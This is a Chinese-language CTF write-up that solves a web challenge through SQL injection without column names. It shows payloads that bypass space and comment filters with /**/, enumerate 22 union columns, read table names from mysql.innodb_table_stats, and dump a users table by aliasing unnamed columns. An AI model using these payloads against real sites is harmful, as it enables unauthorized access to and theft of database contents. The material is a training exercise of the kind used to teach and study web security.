考点:无列名注入
1.
登录界面和注册界面,发现admin账号被注册了,fuzz也没爆出密码来;尝试注入,dirsearch也没东西,源码上也没啥东西
最后注册了一个账号,登录进去
?
?随便填了填,申请过去
这是广告详情
?
?看url上有个id,尝试着注入,也没发现啥问题,没有地方报错
2.在广告申请栏的标题注入1',在查看广告详情
?fuzz,发现or和空格都被过滤了,#和--+也过滤了
没法用order by
空格我们可以用/**/绕过
3.在标题处注入1'/**/union/**/select/**/1'
?
?
列数不对。
这个得一个一个试,知道第22个? emo
1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
同时,可以看出第2、3位是注入点
4. 爆库名
1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
?5.爆表名,因为过滤了or,所以用不了information_schema库
select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()
1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
6. 无列名注入:
无列名注入需要猜测表里有几个字段(我测试完了,3个)
select 1,2,3 union select * from users
1'/**/union/**/select/**/1,(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
?无列名注入爆字段
(select group_concat(a,b,c) from (select 1 as a,2 as b,3 as c union select * from users) as d)
1'/**/union/**/select/**/1,(select/**/group_concat(a,b,c)/**/from/**/(select/**/1/**/as/**/a,2/**/as/**/b,3/**/as/**/c/**/union/**/select/**/*/**/from/**/users)/**/as/**/ d),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
flag{f5afbb63-c1cf-4251-8bb4-c50a059c1abc}?